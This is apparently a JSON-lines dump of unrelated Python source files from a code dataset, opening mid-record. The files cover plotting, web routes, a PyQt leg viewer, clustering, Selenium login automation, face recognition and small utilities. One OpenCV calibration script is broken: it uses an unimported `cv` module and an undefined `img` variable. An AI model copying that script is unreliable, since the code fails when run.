np\nplt.style.use('seaborn-whitegrid')\nfrom mpl_toolkits.mplot3d import *\nfrom matplotlib import cm\nfrom scipy.optimize import minimize\n\n\n\n\nplt.style.use('bmh')\nplt.rcParams[\"figure.figsize\"] = [7,7]\nplt.rcParams[\"axes.spines.right\"] = False\nplt.rcParams[\"axes.spines.top\"] = False\nplt.rcParams[\"font.size\"] = 18\n\nALPHA = 1/2\n\n# Consumer choice\n\ndef budgetc(c0,p,I):\n '''c1 as a function of c0 along budget line'''\n return I - p*c0\n\ndef u(c, a=ALPHA):\n '''Utility at c=(c[0], c[1])'''\n return (c[0]**a)*(c[1]**(1-a))\n\ndef MU0(c, a=ALPHA):\n '''MU of Cobb-Douglas'''\n return a*u(c,a)/c[0] \n\ndef MU1(c, a=ALPHA):\n return (1-a)*u(c,a)/c[1]\n\ndef indif(c0, ubar, a=ALPHA):\n '''c1 as function of c0, implicitly defined by U(c0, c1) = ubar'''\n return (ubar/(c0**a))**(1/(1-a))\n\ndef cd_demands(p,I,a =ALPHA):\n '''Analytic solution for interior optimum'''\n c0 = a * I/p\n c1 = (1-a)*I\n c = [c0,c1]\n uopt = u(c,a)\n return c, uopt\n\ndef consume_plot(p, I, a=ALPHA):\n cmax = max(I, I/p)*1.1\n c0 = np.linspace(0.1,cmax,num=100)\n ce, uebar = cd_demands(p, I, a)\n fig, ax = plt.subplots(figsize=(9,9))\n ax.plot(c0, budgetc(c0, p, I), lw=2.5)\n ax.fill_between(c0, budgetc(c0, p, I), alpha = 0.2)\n ax.plot(c0, indif(c0, uebar, a), lw=2.5)\n ax.vlines(ce[0],0,ce[1], linestyles=\"dashed\")\n ax.hlines(ce[1],0,ce[0], linestyles=\"dashed\")\n ax.plot(ce[0],ce[1],'ob')\n\n ax.set_xlim(0, cmax)\n ax.set_ylim(0, cmax)\n ax.set_xlabel(r'$c_0$', fontsize=16)\n ax.set_ylabel('$c_1$', fontsize=16)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\ndef arb_plot(c0g, I, p):\n cg = [c0g, I - c0g]\n cmax = max(I, I/p)*1.1\n c0 = np.linspace(0.1,cmax,num=100)\n \n '''Display characteristics of a guess along the constraint'''\n fig, ax = plt.subplots(figsize=(9,9))\n ax.plot(c0, budgetc(c0, p, I), lw=1)\n ax.fill_between(c0, budgetc(c0, p, I), alpha = 0.2)\n ax.plot(c0, indif(c0, u(cg)), lw=2.5)\n ax.vlines(cg[0],0,cg[1], linestyles=\"dashed\")\n ax.hlines(cg[1],0,cg[0], linestyles=\"dashed\")\n ax.plot(cg[0],cg[1],'ob')\n mu0pd, mu1pd = MU0(cg), MU1(cg)/p\n if mu0pd > mu1pd:\n inq = r'$>$'\n elif mu0pd < mu1pd:\n inq = r'$<$'\n else:\n inq =r'$=$'\n ax.text(60, 120, r'$\\frac{MU_0}{p_0}$'+inq+r'$\\frac{MU_1}{p_1}$',fontsize=20)\n utext = r'$({:5.1f}, {:5.1f}) \\ \\ U={:5.3f}$'.format(cg[0], cg[1], u(cg))\n ax.text(60, 100, utext, fontsize=12)\n ax.set_xlim(0, cmax)\n ax.set_ylim(0, cmax)\n ax.set_xlabel(r'$c_0$', fontsize=16)\n ax.set_ylabel('$c_1$', fontsize=16)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_title('The No-Arbitrage argument')\n plt.show()\n\n\n#\n\n\n## Ricardian model\n\ndef rppf(mplx, mply, lbar, show = True, title='Home'):\n '''Plot a linear PPF diagram\n show == False delays plt.show() to allow other elements to be plotted first'''\n qy = mply*lbar - (mply/mplx) * QX\n plt.plot(QX, qy, linewidth=2, label='PPF')\n plt.axis([0,XMAX,0,YMAX])\n plt.xlabel(NAMEX), plt.ylabel(NAMEY), plt.title(title)\n plt.text(0.3*XMAX, 0.9*YMAX,\n r' $\\frac{MPL_Y}{MPL_X}=$'+'{:3.2f}'.format(mply/mplx))\n if show: #use False for subplots\n plt.show();\n\n## Linear Demand and Supply\n\n\ndef PD(Q, A, b):\n return np.array(A - b * Q)\n\ndef PS(Q, F, c):\n return np.array(F + c * Q)\n\ndef market(Q, A, b, F, c):\n plt.figure(figsize=(7,7))\n plt.plot(Q,PD(Q, A, b))\n plt.plot(Q, PS(Q, F, c))\n plt.show()\n \n\nif __name__ == '__main__':\n print('Running program tests')\n\n\n","sub_path":"notebooks/intro/cd.py","file_name":"cd.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58173671","text":"from django.shortcuts import render\nfrom module import configtable\nfrom .models import ConfigTable\n\n\ndef create_config_table():\n\n ConfigTable.objects.all().delete()\n\n table = configtable.get_configtable()\n length = len(table['Source'])\n\n for i in range(length):\n ConfigTable.objects.create(source=table['Source'][i],\n configuration=table['Configuration'][i],\n description=table['Description'][i],\n values=table['Values'][i],\n default=table['Default'][i])\n\n\ndef config_table(request):\n\n if ConfigTable.objects.all().count() == 0:\n create_config_table()\n\n ctable = ConfigTable.objects.all()\n return render(request, 'configurations/config_table.html', {'ctable': ctable})\n","sub_path":"configurations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"205834694","text":"from flask import Blueprint, request\nfrom registhor_app.registrations_routes.queries import queries\nfrom registhor_app.utils import check_api_key, _missing_args, _valid_get\n\n# Instantiate blueprint\nregistrations = Blueprint('registrations', __name__)\n\n\n@registrations.route('/api/v1/registrations/course-codes', methods=['GET'])\n@check_api_key\ndef course_codes():\n\t# Only allow 'en' and 'fr' to be passed to app\n\tlang = 'fr' if request.args.get('lang', None) == 'fr' else 'en'\n\t\n\t# Run query and return as JSON\n\tresults = queries.load_course_codes(lang)\n\tresults_processed = _valid_get(results)\n\treturn results_processed\n\n\n@registrations.route('/api/v1/registrations/department-codes', methods=['GET'])\n@check_api_key\ndef department_codes():\n\t# Only allow 'en' and 'fr' to be passed to app\n\tlang = 'fr' if request.args.get('lang', None) == 'fr' else 'en'\n\t\n\t# Run query and return as JSON\n\tresults = queries.load_department_codes(lang)\n\tresults_processed = _valid_get(results)\n\treturn results_processed\n\n\n@registrations.route('/api/v1/registrations/training-locations', methods=['GET'])\n@check_api_key\ndef training_locations():\n\t# Only allow 'en' and 'fr' to be passed to app\n\tlang = 'fr' if request.args.get('lang', None) == 'fr' else 'en'\n\t\n\t# Unpack arguments\n\tdepartment_code = request.args.get('department_code', '').upper()\n\t\n\tif not department_code:\n\t\treturn _missing_args(missing=['department_code'])\n\t\n\t# Run query and return as JSON\n\tresults = queries.load_training_locations(lang, department_code)\n\tresults_processed = _valid_get(results)\n\treturn results_processed\n","sub_path":"registhor_app/registrations_routes/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433928768","text":"#!/usr/bin/env python\n\"\"\"\n\"\"\"\n\nimport sys\n\nimport numpy\nfrom PyQt5 import (QtGui, QtCore, QtWidgets)\n\nimport stompy\n\n\nignore_event_types = [77, 12, 2, 3, 5]\n\n\nclass Leg(object):\n def __init__(self, number=0):\n # joint angles\n self.hip = 0.\n self.thigh = 0.\n self.knee = 0.\n self.number = number\n\n def points(self):\n \"\"\"Generate xyz points for links from angles\"\"\"\n return numpy.array(list(\n stompy.kinematics.leg.angles_to_points(\n self.hip, self.thigh, self.knee)))\n\n def _advance(self):\n \"\"\"Fake leg movement\"\"\"\n if not hasattr(self, '_delta'):\n self._delta = ('hip', 0.05)\n if not hasattr(self, '_limits'):\n self._limits = stompy.geometry.get_limits(self.number)\n jn, da = self._delta\n jv = getattr(self, jn)\n nv = jv + da\n limits = self._limits[jn]\n if limits[0] <= nv <= limits[1]:\n setattr(self, jn, nv)\n return\n # no longer in limits\n if da > 0:\n jn = {'hip': 'thigh', 'thigh': 'knee', 'knee': 'hip'}[jn]\n da *= -1\n self._delta = (jn, da)\n return self._advance()\n\n\nclass OrthoProjection(object):\n # TODO clip elevation and azimuth\n # TODO sanitize scalar\n def __init__(self, elevation=0., azimuth=0., scalar=1., offset=None):\n # TODO use properties to cause update/repaint\n self.elevation = elevation\n self.azimuth = azimuth\n self.scalar = scalar\n if offset is None:\n offset = (0, 0)\n self.offset = offset\n\n def to_transform(self):\n # rotate points by elevation and azimuth\n # apply yaw first\n yT = stompy.transforms.rotation_3d(0., 0., self.azimuth)\n eT = stompy.transforms.rotation_3d(self.elevation, 0., 0.)\n #return yT * eT\n return eT * yT\n\n def project_points(self, pts):\n \"\"\"Project a set of xyz points to xy\"\"\"\n # TODO cache?\n T = self.to_transform()\n tpts = stompy.transforms.transform_3d_array(T, pts)\n #print(tpts)\n # then apply scaling and throw out z\n spts = tpts[:, :2] * self.scalar\n # apply offset\n #print(spts)\n opts = spts + numpy.array(self.offset)[numpy.newaxis, :]\n #print(opts)\n return opts\n\n\nclass LegDisplay(QtWidgets.QWidget):\n def __init__(self):\n super(LegDisplay, self).__init__()\n #self.setAttribute(QtCore.Qt.WA_AcceptTouchEvents)\n for g in (\n QtCore.Qt.PanGesture, QtCore.Qt.SwipeGesture,\n QtCore.Qt.PinchGesture):\n self.grabGesture(g)\n self.projection = OrthoProjection()\n self.leg = Leg()\n self._pens = {\n 'links': [\n QtGui.QPen(QtCore.Qt.red, 2), # hip link\n QtGui.QPen(QtCore.Qt.green, 2), # thigh link\n QtGui.QPen(QtCore.Qt.blue, 2), # calf link\n ],\n 'axes': [\n QtGui.QPen(QtCore.Qt.red, 1, QtCore.Qt.DotLine),\n QtGui.QPen(QtCore.Qt.green, 1, QtCore.Qt.DotLine),\n QtGui.QPen(QtCore.Qt.blue, 1, QtCore.Qt.DotLine),\n ],\n 'limits': QtGui.QPen(QtCore.Qt.magenta, 1, QtCore.Qt.DashLine),\n }\n\n def resizeEvent(self, event):\n # account for any user applied offset\n os = event.oldSize()\n ow, oh = os.width(), os.height()\n ohw, ohh = ow / 2, oh / 2\n dx = self.projection.offset[0] - ohw\n dy = self.projection.offset[1] - ohh\n # event.oldSize()\n self.projection.offset = (\n self.width() / 2 + dx,\n self.height() / 2 + dy)\n\n def paintEvent(self, event):\n #print(\n # \"Azimuth: %s, Elevation: %s\" %\n # (self.projection.azimuth, self.projection.elevation))\n #self.projection.offset = (self.width() / 2, self.height() / 2)\n\n painter = QtGui.QPainter()\n painter.begin(self)\n\n # apply transform to center 0,0\n #T = painter.worldTransform()\n #T.translate(self.width() / 2, self.height() / 2)\n #painter.setWorldTransform(T, combine=False)\n\n painter.setRenderHints(QtGui.QPainter.Antialiasing)\n\n # draw axes\n sx, sy = self.projection.offset\n #sx, sy = 0, 0\n for (i, pen) in enumerate(self._pens['axes']):\n pt = [0., 0., 0.]\n pt[i] = 12.\n x, y = self.projection.project_points([pt])[0]\n painter.setPen(pen)\n painter.drawLine(sx, sy, x, y)\n\n # draw leg\n pts = self.leg.points()\n links = self.projection.project_points(pts)\n sx, sy = self.projection.offset\n #sx, sy = 0, 0\n for (pen, link) in zip(self._pens['links'], links):\n painter.setPen(pen)\n x, y = link\n painter.drawLine(sx, sy, x, y)\n sx, sy = x, y\n\n # draw limits\n z = pts[-1][2]\n lpts = stompy.kinematics.leg.limits_at_z_3d(\n z, self.leg.number)\n if lpts is not None:\n tpts = self.projection.project_points(lpts)\n pen = self._pens['limits']\n painter.setPen(self._pens['limits'])\n painter.drawPolyline(\n QtGui.QPolygonF([QtCore.QPointF(*pt) for pt in tpts]))\n\n # TODO draw foot\n\n # TODO draw load\n\n painter.end()\n\n def event(self, event):\n if event.type() not in ignore_event_types:\n print(event.type(), type(event))\n if isinstance(event, QtWidgets.QGestureEvent):\n return self.gestureEvent(event)\n return super(LegDisplay, self).event(event)\n\n def gestureEvent(self, event):\n r = True\n for g in event.gestures():\n if isinstance(g, QtWidgets.QPinchGesture):\n print('PINCH', g.scaleFactor())\n self.projection.scalar *= g.scaleFactor()\n self.update()\n r = False\n else:\n print(g)\n return r\n\n def mousePressEvent(self, event):\n #print('mouse press', event)\n if event.button() == QtCore.Qt.RightButton:\n # TODO bring out reset positions\n self.projection.azimuth = 0\n self.projection.elevation = numpy.pi / 2.\n self.update()\n if event.button() == QtCore.Qt.MiddleButton:\n pt = event.pos()\n self._middle_click_pos = pt.x(), pt.y()\n if event.button() == QtCore.Qt.LeftButton:\n # right mouse clicked\n pt = event.pos()\n self._right_click_pos = pt.x(), pt.y()\n\n def mouseMoveEvent(self, event):\n #print('mouse move', event)\n if hasattr(self, '_right_click_pos'):\n # drag\n x0, y0 = self._right_click_pos\n pt = event.pos()\n x1, y1 = pt.x(), pt.y()\n dx = x1 - x0\n dy = y1 - y0\n update = False\n # TODO bring out rotation scaling factors\n if (dx != 0): # change azimuth\n self.projection.azimuth -= dx * 0.01\n update = True\n if (dy != 0): # change elevation\n self.projection.elevation -= dy * 0.01\n update = True\n if update:\n self.update()\n self._right_click_pos = (x1, y1)\n if hasattr(self, '_middle_click_pos'):\n # drag\n x0, y0 = self._middle_click_pos\n pt = event.pos()\n x1, y1 = pt.x(), pt.y()\n dx = x1 - x0\n dy = y1 - y0\n self.projection.offset = (\n self.projection.offset[0] + dx,\n self.projection.offset[1] + dy)\n self.update()\n self._middle_click_pos = (x1, y1)\n\n def mouseReleaseEvent(self, event):\n #print('mouse release', event)\n if hasattr(self, '_right_click_pos'):\n del self._right_click_pos\n if hasattr(self, '_middle_click_pos'):\n del self._middle_click_pos\n\n def wheelEvent(self, event):\n #print('wheel', event)\n d = event.delta()\n print(d)\n nd = max(-1., min(1., d / 1000.)) + 1.\n self.projection.scalar *= nd\n self.update()\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n #w = QtGui.QWidget()\n w = LegDisplay()\n w.resize(300, 300)\n w.move(300, 300)\n w.setWindowTitle('Simple')\n w.show()\n w.projection.scalar = 3.\n w.projection.elevation = numpy.pi / 4.\n\n def tick():\n #w.projection.azimuth += numpy.pi / 50.\n #w.projection.elevation += numpy.pi / 50.\n\n # fake move leg\n w.leg._advance()\n\n w.update()\n\n timer = QtCore.QTimer()\n timer.timeout.connect(tick)\n timer.start(33)\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/nogl_leg_pyqt5.py","file_name":"nogl_leg_pyqt5.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29937001","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\nimport pandas as pd\nimport numpy as np\nimport json\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\nwith open('usuarios.txt', 'r') as file:\n usuarios = json.load(file)\n\n#formatando dados para utilização no algoritmo K-means\ndata = []\n\ncolumns = [\"username\",\"reputation\",\"user_mentions\", \"retweets\", \"urls\", \"statuses_count\"]\n\nfor usuario in usuarios:\n user_array = []\n\n # não utilizando o nome do usuário como parâmetro\n # user_array.append(usuario)\n user_array.append(usuarios[usuario][\"reputation\"])\n user_array.append(usuarios[usuario][\"user_mentions\"])\n user_array.append(usuarios[usuario][\"retweets\"])\n user_array.append(usuarios[usuario][\"urls\"])\n user_array.append(usuarios[usuario][\"statuses_count\"])\n \n data.append(user_array)\n\n#Padronização dos dados\nX_std = StandardScaler().fit_transform(data)\n\n#inicializando PCA para gerar 2 principais componentes\npca = PCA(n_components=2)\nprincipalComponents = pca.fit_transform(X_std)\n\nPCA_components = pd.DataFrame(principalComponents, columns=['pca1','pca2'])\n\nkmeans = KMeans(n_clusters=2,random_state=0).fit(PCA_components)\nlabels = kmeans.labels_\n\n#nomenclatura dos clusters são as labels geradas pelo kmeans\nPCA_components['cluster'] = labels\nPCA_components['usuario']= usuarios\n\n#salvando resultados em json em um arquivo externo para conferência dos perfis\nPCA_components.to_json(r'~/Documentos/hidrenix/classificacao.txt', orient='records')\n\n#plot do gráfico em 2 dimensões\nsns.lmplot('pca1', 'pca2',\n data=PCA_components,\n fit_reg=False,\n hue=\"cluster\",\n scatter_kws={\"marker\":\"D\", \"s\": 100})\n\nplt.title(\"Clusters PCA\")\nplt.xlabel('PCA_1')\nplt.ylabel('PCA_2')\n\nplt.show()","sub_path":"clusterization.py","file_name":"clusterization.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5360794","text":"METRIC_FORMATS = {\n 'CHAR': 'c',\n 'COMPLEX': 'dd',\n 'DOUBLE': 'd',\n 'FLOAT': 'd',\n 'HISTOGRAM': 'P',\n 'INT': 'i',\n 'INT16': 'h',\n 'INT32': 'i',\n 'INT64': 'q',\n 'INT8': 'b',\n 'INTEGER': 'q',\n 'MAXDOUBLE': 'd',\n 'MINDOUBLE': 'd',\n 'NDOUBLES': 'P',\n 'RATE': 'P',\n 'SCALE_FUNC': 'P',\n 'SHORT INT': 'h',\n 'SIGNED INT': 'i',\n 'SIGNED INTEGER': 'q',\n 'SIGNED SHORT INT': 'h',\n 'TAU_ATOMIC': 'P',\n 'UINT16': 'H',\n 'UINT32': 'I',\n 'UINT64': 'Q',\n 'UINT8': 'c',\n 'UNSIGNED INT': 'I',\n 'UNSIGNED INTEGER': 'Q',\n 'UNSIGNED SHORT INT': 'H',\n}\n","sub_path":"pycubexr/utils/metric_formats.py","file_name":"metric_formats.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"35795358","text":"import os \nfrom selenium import webdriver \nfrom selenium.webdriver.chrome.options import Options \nfrom selenium.webdriver.common.keys import Keys\n\nCHROMEDRIVER_PATH = \"C:/tools/selenium/chromedriver.exe\"\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\") \nchrome_options.add_argument('--disable-gpu')\ndriver = webdriver.Chrome(CHROMEDRIVER_PATH, chrome_options=chrome_options)\n \nuser = \"\"\npwd = \"\"\ndriver.get(\"http://www.facebook.com\")\nassert \"Facebook\" in driver.title\nelem = driver.find_element_by_id(\"email\")\nelem.send_keys(user)\nelem = driver.find_element_by_id(\"pass\")\nelem.send_keys(pwd)\nelem.send_keys(Keys.RETURN)\ndriver.save_screenshot('example1-chrome-headless-screen1.png')\ndriver.close()\n","sub_path":"roles/seleniumpythonexamples_win/files/example1-chrome-headless.py","file_name":"example1-chrome-headless.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"523359549","text":"from __future__ import unicode_literals\n\nimport os\n\nfrom setuptools import setup\n\n\nVERSION = '0.0.1dev1'\n\n\ndef write_version_py(filename=None):\n if filename is None:\n filename = os.path.join(os.path.dirname(__file__),\n 'stackimport', 'version.py')\n ver = \"\"\"\\\nversion = '{version}'\n\"\"\"\n fh = open(filename, 'wb')\n try:\n fh.write(ver.format(version=VERSION).encode('utf-8'))\n finally:\n fh.close()\n\n\nwrite_version_py()\n\n\nsetup(\n name='stackimport',\n version=VERSION,\n url='https://github.com/enthought/pydata-ldn-2014',\n author='Simon Jagoe',\n author_email='simon@simonjagoe.com',\n classifiers=[\n 'Development Status :: 1 - Planning',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Programming Language :: Python',\n ],\n description='Postgresql importer for stackexchange data',\n packages=['stackimport'],\n)\n","sub_path":"stackexchange/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"562134842","text":"pkgname = \"sushi\"\npkgver = \"44.2\"\npkgrel = 0\nbuild_style = \"meson\"\nhostmakedepends = [\n \"meson\",\n \"pkgconf\",\n \"glib-devel\",\n \"gobject-introspection\",\n \"gettext\",\n \"gjs\",\n]\nmakedepends = [\n \"glib-devel\",\n \"libepoxy-devel\",\n \"freetype-devel\",\n \"evince-devel\",\n \"gdk-pixbuf-devel\",\n \"gstreamer-devel\",\n \"gst-plugins-base-devel\",\n \"gtk+3-devel\",\n \"gtksourceview4-devel\",\n \"harfbuzz-devel\",\n \"webkitgtk-devel\",\n]\ndepends = [\"evince\", \"nautilus\"]\npkgdesc = \"File previewer for GNOME\"\nmaintainer = \"q66 \"\nlicense = \"GPL-2.0-or-later\"\nurl = \"https://gitlab.gnome.org/GNOME/sushi\"\nsource = f\"$(GNOME_SITE)/{pkgname}/{pkgver[:-2]}/{pkgname}-{pkgver}.tar.xz\"\nsha256 = \"6c002fe0aea19027ba448b5aec94d5cd753c9752f996ee033152428738ea43e9\"\n","sub_path":"main/sushi/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"215301191","text":"import cv2\nimport pyk4a\nfrom helpers import colorize\nfrom pyk4a import Config, PyK4A\nimport numpy as np\n\ncriteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((3*3,3), np.float32)\nobjp[:,:2] = np.mgrid[0:3,0:3].T.reshape(-1,2)\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\n\ndef main():\n k4a = PyK4A(\n Config(\n color_resolution=pyk4a.ColorResolution.RES_720P,\n depth_mode=pyk4a.DepthMode.NFOV_UNBINNED,\n )\n )\n k4a.start()\n\n exp_dict = {-11: 500, -10: 1250, -9: 2500, -8: 8330, -7: 16670, -6: 33330}\n exp_val = -7 # to be changed when running\n k4a.exposure = exp_dict[exp_val]\n\n id = 0\n\n while True:\n capture = k4a.get_capture()\n\n if capture.color is not None:\n color = capture.color\n cv2.imshow(\"Color\", color)\n\n if capture.transformed_depth is not None:\n depth_transformed = capture.transformed_depth\n cv2.imshow(\n \"Transformed Depth\", colorize(depth_transformed, (600, 1100))\n )\n\n gray = cv.cvtColor(color, cv.COLOR_BGR2GRAY)\n # Find the chess board corners\n ret, corners = cv.findChessboardCorners(gray, (3,3), None)\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n corners2 = cv.cornerSubPix(gray,corners, (3,3), (-1,-1), criteria)\n imgpoints.append(corners)\n # Draw and display the corners\n cv.drawChessboardCorners(img, (3,3), corners2, ret)\n cv.imshow('img', img)\n cv.waitKey(1)\n\n key = cv2.waitKey(1)\n if key == ord('s'):\n cv2.imwrite(f\"data/intrinsic_test/color_{id}.png\", color)\n id += 1\n elif key == ord('q'):\n cv2.destroyAllWindows()\n break\n\n k4a.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"realtime_5x5.py","file_name":"realtime_5x5.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"226838812","text":"\"\"\" \nConverts coordinates from GPS coorodinates (latitude/longitude - epsg:4326) from geojson file to any chosen epsg projection \nand saving these new coordinates to the new geojson file (new_file)\n\"\"\"\n\nimport pyproj\nimport geojson\nimport json\n\ndef coor_converter(file, new_file, epsg):\n # Transformation from GPS coordinates to desired epsg projection\n transformer = pyproj.Transformer.from_crs(\"epsg:4326\",\"epsg:\"+str(epsg))\n \n # Open geojson file with GPS coordinates\n with open(file) as f:\n gj = geojson.load(f)\n \n # Load coordinates from geojson file\n cdnts = gj['features'][0]['geometry']['coordinates']\n \n # Transformation of coordinates\n k = 0\n n = len(cdnts)\n m = len(cdnts[0])\n trans_coord = [[0]*m for i in range(n)]\n for i in range(len(cdnts)):\n for j in range(len(cdnts[0])):\n [x1, y1] = cdnts[i][j]\n trans_coord[0][k] = transformer.transform(y1, x1)\n k += 1\n \n with open(file, 'r') as f:\n data = json.load(f)\n\n data['features'][0]['geometry']['coordinates'] = trans_coord\n \n with open(new_file, 'w+') as f:\n json.dump(data, f)\n \n print(\"The file {} has been saved!\".format(new_file))\n ","sub_path":"coordinates_converter.py","file_name":"coordinates_converter.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"261241015","text":"import cv2\nimport os\nimport numpy as np\nimport cv2.cuda\nimport time\nimport csv\n\nCSV_MODE = 'w'\n\ncapture = cv2.VideoCapture(0)\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read('face-trainner_nohair_nosize.yml')\n\ndef tryFaces(frame, ang, scale, file_name):\n framCpy = np.copy(frame)\n face_cascade = cv2.CascadeClassifier('cascades/haarcascade_frontalface_alt2.xml')\n frame_gray = cv2.cvtColor(framCpy, cv2.COLOR_BGR2GRAY)\n # frame_gray = cv2.equalizeHist(frame_gray)\n\n # -- Detect faces\n faces = face_cascade.detectMultiScale(frame_gray, scaleFactor=scale)\n best_dist = 1000\n best_match = (-1,0,0,0)\n count = 0\n for (x, y, w, h) in faces:\n center = (x + w // 2, y + h // 2)\n framCpy = cv2.ellipse(framCpy, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 2)\n roi = frame_gray[y:y + h, x:x + w]\n _id, clvl = recognizer.predict(roi)\n if clvl > 0:\n count += 1\n if clvl1:\n\n best_dist = clvl\n best_match = (x,y,w,h)\n #if clvl < 100:\n cv2.putText(framCpy, f\"{clvl:.2f}\", (x, y+10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2,\n cv2.LINE_AA)\n #-- In each face, detect eyes\n #cv2.imshow(\"testroi\", roi)\n\n writer.writerow([file_name, ang, len(faces), count])\n\n if not best_match == (-1,0,0,0):\n x, y, w, h = best_match\n framCpy = cv2.rectangle(framCpy, (x,y), (x+w,y+h), (255,255,0), thickness=10)\n cv2.putText(framCpy, \"Jon\", (x, y + 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2,\n cv2.LINE_AA)\n\n\n if(framCpy.shape[0] > 1000 or framCpy.shape[1] > 1000):\n scale_percent = 30 # percent of original size\n width = int(framCpy.shape[1] * scale_percent / 100)\n height = int(framCpy.shape[0] * scale_percent / 100)\n dim = (width, height)\n framCpy = cv2.resize(framCpy, dim, interpolation=cv2.INTER_AREA)\n\n return framCpy\n\ndef rotate_image(image, angle):\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)\n result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n return result\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nchallenge_dir = os.path.join(BASE_DIR, \"challenges\\Dataset\")\nEVAL_DIR = os.path.join(BASE_DIR, '..', 'Eval')\nDATA_DIR = os.path.join(EVAL_DIR, 'rotation')\n\nsave_file = open(os.path.join(EVAL_DIR, \"rotation_LBPH.csv\"), CSV_MODE, newline='')\nwriter = csv.writer(save_file)\n\noutput_dir = os.path.join(EVAL_DIR, \"rotation LBPH\")\n\n\nif CSV_MODE == 'w':\n writer.writerow([\"file\", \"angle\", \"detections\", \"matches\"])\n\n\nif not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\nfor root, dirs, files in os.walk(DATA_DIR):\n if \"unused\" in root:\n continue\n for file in files:\n file = file.lower()\n if file.endswith(\"png\") or file.endswith(\"jpg\") or file.endswith(\"jpeg\"):\n file_name = os.path.splitext(file)[0]\n data_output_dir = os.path.join(output_dir, file_name)\n if not os.path.isdir(data_output_dir):\n os.mkdir(data_output_dir)\n img = cv2.imread(os.path.join(root, file))\n for i in range(-91, 91):\n cv2.imwrite(os.path.join(data_output_dir, str(i) + \".jpg\"), tryFaces(rotate_image(img, i), i, 1.09, file_name))\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","sub_path":"Task 1/rotationGetData_LBPH.py","file_name":"rotationGetData_LBPH.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"437315560","text":"'''\nProblem Description\nWrite a function that checks whether two strings are anagrams of each other. A string s1 is an anagram of another string s2 if the same characters exist in both s1 and s2 in any order. For example: \"abcd\" and \"cdab\" are anagrams. Also \"aabfffr\" and \"afbfraf\" are anagrams.\n\nSample inputs - Expected outputs\n\"abcd\", \"cdab\" -> True\n\"aabfffr\", \"afbfraf\" -> True\n\"kdkd\", \"dkdr\" -> False\n'''\n\ndef AnagramBloomberg2(a,b):\n\n if ''.join(sorted(a))==''.join(sorted(b)):\n return True\n else:\n return False\ndef AnagramBloomberg1(a,b):\n\n if len(a)!=len(b):\n return False\n else:\n dict={}\n for key in list(a):\n if key in dict.keys():\n dict[key]=dict.get(key)+1\n else:\n dict[key]=1\n for key in list(b):\n if key in dict.keys() and dict.get(key)>0:\n dict[key]=dict.get(key)-1\n else:\n return False\n return True\n\ndef main():\n\n a='abcd'\n b='cdab'\n print(AnagramBloomberg1(a,b))\n print(AnagramBloomberg2(a, b))\n\n a = 'aabfffr'\n b = 'afbfraf'\n print(AnagramBloomberg1(a, b))\n print(AnagramBloomberg2(a, b))\n\n a = 'kdkd'\n b = 'dkdr'\n print(AnagramBloomberg1(a, b))\n print(AnagramBloomberg2(a, b))\n\nif __name__=='__main__':\n 